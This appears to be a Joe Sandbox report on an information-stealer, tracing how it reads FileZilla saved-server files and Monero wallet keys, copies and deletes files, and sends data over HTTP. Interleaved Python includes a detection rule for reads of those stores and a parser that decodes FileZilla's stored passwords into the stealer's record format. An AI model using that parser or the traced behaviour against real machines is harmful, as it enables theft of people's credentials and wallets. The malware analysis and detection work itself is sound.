                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 35ae6b675a2d3ca2f779fdfefa113ed81860d8472646319973883c72462af514
                              • Instruction ID: 20d20034141a1cc80637fabcdb7750a34ddd67a8b97d9de7bdc7c09fef2cd337
                              • Opcode Fuzzy Hash: 35ae6b675a2d3ca2f779fdfefa113ed81860d8472646319973883c72462af514
                              • Instruction Fuzzy Hash: 246124F3E087145BE3049E29EC8573AB7D5EB94720F1A863DDEC897384EA795C058682
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cd1827fcc110bf1e512ee3943b4e4db49c7c5fad1d8be47271543d1b5a3cf926
                              • Instruction ID: 5d3b1a59fe0fb9fad545e69a6ccc6c342474b0f83e53d6bd366d8204b2ac2de1
                              • Opcode Fuzzy Hash: cd1827fcc110bf1e512ee3943b4e4db49c7c5fad1d8be47271543d1b5a3cf926
                              • Instruction Fuzzy Hash: CF6115B35083049FE308AE39DC9563AFBE8EF54720F160A3DEAC587740E63658458653
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0702c944c6a05af4f8fab1510ed2acd1a6d7a9bfee076e6737cfe4e66afe491c
                              • Instruction ID: 0ecc4596bf137ab56c8eab73bbfc209e08c2ded4052d50e0718b0b75944c203b
                              • Opcode Fuzzy Hash: 0702c944c6a05af4f8fab1510ed2acd1a6d7a9bfee076e6737cfe4e66afe491c
                              • Instruction Fuzzy Hash: E74117B3A181148FF304AA2DEC957BBB2D6EB94311F1A853DDAD9D3344E93A5C018786
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d3414a98bc7ef2515c4364e616eb216fb8b1c02de31aeb4338a4b80ce4fdb9f
                              • Instruction ID: fa38d0a1a477be9fd230fc5b2e0b4b0ddb74c1e6bd5d81126d1f4eb55dc5dc3e
                              • Opcode Fuzzy Hash: 8d3414a98bc7ef2515c4364e616eb216fb8b1c02de31aeb4338a4b80ce4fdb9f
                              • Instruction Fuzzy Hash: 883132F39087004BE3446E39EC42366B7E6EFA5330F2B063DC5C583384EA3A98058682
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00950DBA,00950DB7,00950DB6,00950DB3), ref: 00940362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00940369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00940385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 009403CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 009403DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00940419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00940463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00940562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00940571
                              • lstrcat.KERNEL32(?,url: ), ref: 00940580
                              • lstrcat.KERNEL32(?,00000000), ref: 00940593
                              • lstrcat.KERNEL32(?,00951678), ref: 009405A2
                              • lstrcat.KERNEL32(?,00000000), ref: 009405B5
                              • lstrcat.KERNEL32(?,0095167C), ref: 009405C4
                              • lstrcat.KERNEL32(?,login: ), ref: 009405D3
                              • lstrcat.KERNEL32(?,00000000), ref: 009405E6
                              • lstrcat.KERNEL32(?,00951688), ref: 009405F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00940604
                              • lstrcat.KERNEL32(?,00000000), ref: 00940617
                              • lstrcat.KERNEL32(?,00951698), ref: 00940626
                              • lstrcat.KERNEL32(?,0095169C), ref: 00940635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 17a4748e8cda58bb2e56c8a22d01f8bcda0e0513b3313eb2b44de26dd77b62a5
                              • Instruction ID: a7686020a818b7cb1051fe830f54f9aacec7478803d5c165842444353e01ee2c
                              • Opcode Fuzzy Hash: 17a4748e8cda58bb2e56c8a22d01f8bcda0e0513b3313eb2b44de26dd77b62a5
                              • Instruction Fuzzy Hash: 22D14D72940208ABDB04EBF0DD96FEE7339EFD4305F404518F506A7191EE34AA4ACB62
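The function above reads %APPDATA%\FileZilla\recentservers.xml, locates the <Host>, <Port>, <User> and <Pass encoding="base64"> tags with StrStrA (a plain substring search, not an XML parser) and concatenates a record built from the literals "browser: FileZilla", "profile: null", "url: ", "login: " and "password: ". The Python below is an added example, not code from the sample or from the Joe Sandbox report. It parses the same file with a real XML parser, decodes the base64 password and renders the record in that layout so an analyst can recognise the format in exfiltrated data. The sample XML is constructed; the separators between fields (a colon between host and port, a newline after each field) are an assumption, because the report shows only the addresses 00951678, 0095167C, 00951688, 00951698 and 0095169C for those strings.

```python
"""
Parse FileZilla's recentservers.xml and emit the record layout seen in the
analysed function. Added example; not code from the sample or from the report.
"""
import base64
import xml.etree.ElementTree as ET

# Constructed sample input, shaped like %APPDATA%\FileZilla\recentservers.xml.
# The first server has a base64 password, the second one (key-based logon)
# has no <Pass> element at all, which the parser must tolerate.
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.0" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>bob</User>
      <Logontype>5</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def parse_recent_servers(xml_text: str) -> list:
    """Return one dict per <Server>, decoding base64 passwords.

    The sample finds the same four tags with StrStrA; ElementTree yields the
    same fields without the substring-search fragility.
    """
    root = ET.fromstring(xml_text.encode("utf-8"))
    servers = []
    for srv in root.iter("Server"):
        pw_el = srv.find("Pass")
        password = None
        if pw_el is not None and pw_el.text:
            if pw_el.get("encoding") == "base64":
                password = base64.b64decode(pw_el.text).decode("utf-8", "replace")
            else:
                password = pw_el.text  # older FileZilla versions stored it in clear
        servers.append({
            "host": (srv.findtext("Host") or "").strip(),
            "port": (srv.findtext("Port") or "").strip(),
            "user": (srv.findtext("User") or "").strip(),
            "password": password,
        })
    return servers


def format_record(entry: dict) -> str:
    """Lay one entry out in the order of the function's lstrcat calls.

    The labels are the literals from the report; the ":" between host and
    port and the "\\n" after each field are assumed separators.
    """
    password = entry["password"] if entry["password"] is not None else ""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {entry['host']}:{entry['port']}\n"
        f"login: {entry['user']}\n"
        f"password: {password}\n"
        "\n"
    )


def dump_records(xml_text: str) -> str:
    """Render every server in the file as one concatenated text blob."""
    return "".join(format_record(e) for e in parse_recent_servers(xml_text))


if __name__ == "__main__":
    print(dump_records(SAMPLE_RECENTSERVERS_XML), end="")
```

The "browser: FileZilla" / "profile: null" header is the same shape the sample uses for browser credential records, so a single regex over recovered exfiltration data can pull FileZilla entries out alongside browser logins.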
                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009359F8
                              • StrCmpCA.SHLWAPI(?,010FE238), ref: 00935A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00935B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,010FE2E8,00000000,?,010F9BC0,00000000,?,00951A1C), ref: 00935E71
                              • lstrlen.KERNEL32(00000000), ref: 00935E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00935E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00935E9A
                              • lstrlen.KERNEL32(00000000), ref: 00935EAF
                              • lstrlen.KERNEL32(00000000), ref: 00935ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00935EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00935F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00935F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00935F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00935FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00935FBD
                              • HttpOpenRequestA.WININET(00000000,010FE3B8,?,010FD8B8,00000000,00000000,00400100,00000000), ref: 00935BF8
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • InternetCloseHandle.WININET(00000000), ref: 00935FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 19888ee2c3cd09f54fecd9c5515d71355c6eca340809100636bf702c6aa18b8c
                              • Instruction ID: 78bf730a098ef71d435d8e70575710ad1ea2e00735334775681b534b99166ba2
                              • Opcode Fuzzy Hash: 19888ee2c3cd09f54fecd9c5515d71355c6eca340809100636bf702c6aa18b8c
                              • Instruction Fuzzy Hash: 1112ED72860118AAEB15EBA0DC96FEEB378FF94704F504199F10A63191EF702E49CF65
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,010F9920,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0093D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0093D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D208
                              • lstrcat.KERNEL32(?,00951478), ref: 0093D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D22A
                              • lstrcat.KERNEL32(?,0095147C), ref: 0093D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D24C
                              • lstrcat.KERNEL32(?,00951480), ref: 0093D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D26E
                              • lstrcat.KERNEL32(?,00951484), ref: 0093D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D290
                              • lstrcat.KERNEL32(?,00951488), ref: 0093D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D2B2
                              • lstrcat.KERNEL32(?,0095148C), ref: 0093D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D2D4
                              • lstrcat.KERNEL32(?,00951490), ref: 0093D2E3
                                • Part of subcall function 0094A820: lstrlen.KERNEL32(00934F05,?,?,00934F05,00950DDE), ref: 0094A82B
                                • Part of subcall function 0094A820: lstrcpy.KERNEL32(00950DDE,00000000), ref: 0094A885
                              • lstrlen.KERNEL32(?), ref: 0093D32A
                              • lstrlen.KERNEL32(?), ref: 0093D339
                                • Part of subcall function 0094AA70: StrCmpCA.SHLWAPI(010F8848,0093A7A7,?,0093A7A7,010F8848), ref: 0094AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0093D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 688c262f0536dc4bf818dfdf429321edb5b38f432cdc8452ee2adbbf9a17b9fb
                              • Instruction ID: 0efed66bf2ac873817bb1267263d53ccd3eb6683788f26173b2489da399b3c43
                              • Opcode Fuzzy Hash: 688c262f0536dc4bf818dfdf429321edb5b38f432cdc8452ee2adbbf9a17b9fb
                              • Instruction Fuzzy Hash: 34E14B72950108ABEB04EBA0DD96FEE7379FF94305F104158F106B71A1DE35AE4ACB62
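Across the functions in this section the sample builds paths ending in \AppData\Roaming\FileZilla\recentservers.xml and \Monero\wallet.keys, opens or copies the file (CreateFileA / CopyFileA), and in the function above deletes its working copy again (DeleteFileA). Reads of those stores by anything other than the owning application are a cheap host-side detection. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it runs that rule over a few constructed file-read events and escalates a process that touches more than one store. The event format (timestamp|pid|image|target, pipe-separated), the list of expected readers and the Documents\Monero location of wallet.keys are assumptions; adapt them to whatever file-access telemetry (for example object-access auditing or an EDR file-read feed) is actually available.

```python
"""
Flag processes that read the credential stores this sample targets.
Added example; not part of the Joe Sandbox report or of the sample's code.
"""
from collections import defaultdict
from dataclasses import dataclass

# Path suffixes taken from the function analysis; compared case-insensitively.
SENSITIVE_SUFFIXES = (
    r"\appdata\roaming\filezilla\recentservers.xml",
    r"\monero\wallet.keys",
)

# Processes expected to open each store (assumption; tune per environment).
EXPECTED_READERS = {
    r"\appdata\roaming\filezilla\recentservers.xml": {"filezilla.exe"},
    r"\monero\wallet.keys": {"monero-wallet-gui.exe", "monero-wallet-cli.exe"},
}

# Constructed file-read events in an assumed "<timestamp>|<pid>|<image>|<target>" layout.
SAMPLE_EVENTS = (
    "2024-10-24T10:01:02Z|4120|C:\\Program Files\\FileZilla FTP Client\\filezilla.exe"
    "|C:\\Users\\alice\\AppData\\Roaming\\FileZilla\\recentservers.xml\n"
    "2024-10-24T10:02:17Z|6688|C:\\Users\\alice\\Downloads\\file.exe"
    "|C:\\Users\\alice\\AppData\\Roaming\\FileZilla\\recentservers.xml\n"
    "2024-10-24T10:02:18Z|6688|C:\\Users\\alice\\Downloads\\file.exe"
    "|C:\\Users\\alice\\Documents\\Monero\\wallet.keys\n"
    "2024-10-24T10:03:00Z|1200|C:\\Windows\\explorer.exe"
    "|C:\\Users\\alice\\Documents\\notes.txt\n"
)


@dataclass(frozen=True)
class Alert:
    timestamp: str
    pid: int
    image: str
    target: str
    severity: str


def _matched_suffix(path: str):
    """Return the sensitive suffix the path ends with, or None."""
    low = path.lower()
    for suffix in SENSITIVE_SUFFIXES:
        if low.endswith(suffix):
            return suffix
    return None


def find_suspicious_reads(log_text: str) -> list:
    """Alert on unexpected readers of the targeted stores.

    A process that touches more than one distinct store is rated 'high'
    (the multi-target pattern of a stealer); a single store is 'medium'.
    """
    hits = []                       # (timestamp, pid, image, target, suffix)
    stores_per_pid = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, pid, image, target = line.split("|", 3)
        suffix = _matched_suffix(target)
        if suffix is None:
            continue
        exe = image.rsplit("\\", 1)[-1].lower()
        if exe in EXPECTED_READERS.get(suffix, set()):
            continue                # the owning application reading its own file
        hits.append((ts, int(pid), image, target, suffix))
        stores_per_pid[int(pid)].add(suffix)
    return [
        Alert(ts, pid, image, target,
              "high" if len(stores_per_pid[pid]) > 1 else "medium")
        for ts, pid, image, target, _ in hits
    ]


if __name__ == "__main__":
    for alert in find_suspicious_reads(SAMPLE_EVENTS):
        print(f"{alert.severity:6} pid={alert.pid} {alert.image} -> {alert.target}")
```

Because the sample copies the wallet file before reading it, a CopyFileA-style duplicate appearing next to a read of recentservers.xml from the same unsigned process is the strongest version of this signal; the severity escalation above is the simplest way to encode that.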
                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00934915
                              • StrCmpCA.SHLWAPI(?,010FE238), ref: 0093493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00934ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00950DDB,00000000,?,?,00000000,?,",00000000,?,010FE288), ref: 00934DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00934E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00934E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00934E49
                              • InternetCloseHandle.WININET(00000000), ref: 00934EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00934EC5
                              • HttpOpenRequestA.WININET(00000000,010FE3B8,?,010FD8B8,00000000,00000000,00400100,00000000), ref: 00934B15
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • InternetCloseHandle.WININET(00000000), ref: 00934ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
